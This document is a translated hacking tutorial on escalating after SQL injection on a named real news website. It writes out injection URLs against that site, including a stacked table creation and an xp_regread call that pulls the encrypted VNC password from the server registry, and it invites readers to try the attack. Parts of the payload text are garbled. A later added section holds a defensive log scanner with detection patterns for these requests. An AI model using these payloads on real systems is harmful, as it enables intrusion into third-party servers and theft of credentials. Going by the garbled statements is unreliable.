Some tips for escalating privileges after SQL injection on a well-known website

xiaoxiao2021-03-06  17

17173: Some tips for escalating privileges after injection

Producer: Ding Lin

QQ: 109295766

website:

Www.22tian.com

-------------------------------------------------- -----------------------------

Website injection is the most popular website intrusion technique today, and major websites in China have injection points too. Perhaps it is not that these sites have no vulnerabilities, only that no one has tested them! Don't overestimate the designers of well-known sites!

I haven't done a tutorial for a long time. Today I will talk about how to keep testing these websites once an injection point has been found.

Many people find an injection point on a website, cannot guess the password or cannot find the admin back end, and then see that the account only has the DB_OWNER role.

Most of them get stuck right here.

I will take 17173, a well-known Chinese website with a world ranking, as an example of obtaining server privileges.

(Explanation only, no hands-on demonstration; anyone interested can test it themselves.) That is because I am afraid of being caught by the police.

Anyone who is not afraid can test it; I am just too timid myself!

1, Find the injection point

There are plenty of articles on how to find an injection point; look them up yourself.

The address I found is http://news.17173.com/m_false.asp?newsid=70739

1=1 returns correctly and 1=2 returns an error, which shows that the injection exists.

2, Then test it with NBSI. I have not used my NBSI for a long time.

It shows only DB_OWNER permission.

I will not demonstrate this part any further; read on.

3, Scan the ports of the website's server to see which services the host has open; do this yourself.

4, Assume the server runs a VNC service; VNC corresponds to port 5900 (check for yourself which services are actually open).

We create a table named DING on the server and add a field of type char named DLIN.

(The uniqueidentifier data type is used to store 16 bytes of binary data.)

Then add data to the table:

Http://news.17173.com/m_false.asp?newsid=70739;create Table [DBO]. [DING] ([DLIN] [UNIQUEIDENTINTIER]);

Look here: this is the table I created before the tutorial.

Then add data to the table:

http://news.17173.com/m_false.asp?newsid=70739;DECLARE @result uniqueidentifier EXEC master.dbo.xp_regread HKEY_CURRENT_USER, Software / ORL / ​​WinVNC3, Password, @result output insert into ding (dlin) values ​​(@ Result; -

The above command reads the value of VNC's encrypted password from the registry and then inserts that value into the DING table just created.

In this way the encrypted password from the registry ends up in the table.

Let's look at the result:

Http://news.17173.com/; And (Select Count (*) from ding where dlin> 1

In the result we can see the encrypted VNC password, which can then be run through a tool to recover the password. What you do next is up to you.

Of course, this is just an example. If the server does not run VNC, other services work the same way; the statements above only need slight changes.
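A defender's view of the requests described above, as an added example that is not part of the original article: a small Python scanner that flags the 1=1 probe, stacked statements and xp_reg* calls in web server logs. The log layout, rule names, sample lines, dates and addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

NUMERIC_PARAMS = {"newsid"}  # assumption: parameters the application expects to be integers

# Rule names are hypothetical; patterns come from the probe and statements shown in the article.
RULES = [
    ("boolean-probe", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("stacked-statement", re.compile(r";\s*(create|declare|exec|insert|select)\b", re.I)),
    ("registry-xp", re.compile(r"\bxp_reg\w+", re.I)),
]

def inspect_query(query):
    """Return the sorted rule names matched by one raw (still URL-encoded) query string."""
    hits = {name for name, rx in RULES if rx.search(unquote_plus(query))}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key.lower() in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", unquote_plus(value)):
            hits.add("non-numeric-id")
    return sorted(hits)

def scan_log(lines):
    """Return (client_ip, uri_stem, hits) for each log line whose query matches a rule."""
    findings = []
    for line in lines:
        parts = line.split()
        if line.startswith("#") or len(parts) < 7:
            continue  # skip W3C header directives and malformed lines
        _date, _time, ip, _method, stem, query, _status = parts[:7]
        hits = inspect_query(query)
        if hits:
            findings.append((ip, stem, hits))
    return findings

# Constructed sample in a W3C-style layout; addresses are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-15 10:00:01 192.0.2.10 GET /m_false.asp newsid=70739 200
2024-01-15 10:02:13 198.51.100.7 GET /m_false.asp newsid=70739+and+1=1 200
2024-01-15 10:05:40 198.51.100.7 GET /m_false.asp newsid=70739;create+table+ding+(dlin+uniqueidentifier) 200
2024-01-15 10:06:02 198.51.100.7 GET /m_false.asp newsid=70739;exec+master.dbo.xp_regread+<args-omitted> 500
""".splitlines()

if __name__ == "__main__":
    for ip, stem, hits in scan_log(SAMPLE_LOG):
        print(ip, stem, ", ".join(hits))
```

The same integer check applied in the application before the query is built, or a parameterized query, closes the injection point itself; running the web application's database login with less than DB_OWNER limits what a remaining flaw can reach.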

Well, that is all I will say for today!

Everyone is welcome to join the Yun Tian network group for technical exchange, group number: 778618

Don't come after me, I am afraid! So this is only a small hint; don't do it for real. If your courage is big enough, then you can try it.

When reposting, please cite the original address: https://www.9cbs.com/read-41286.html
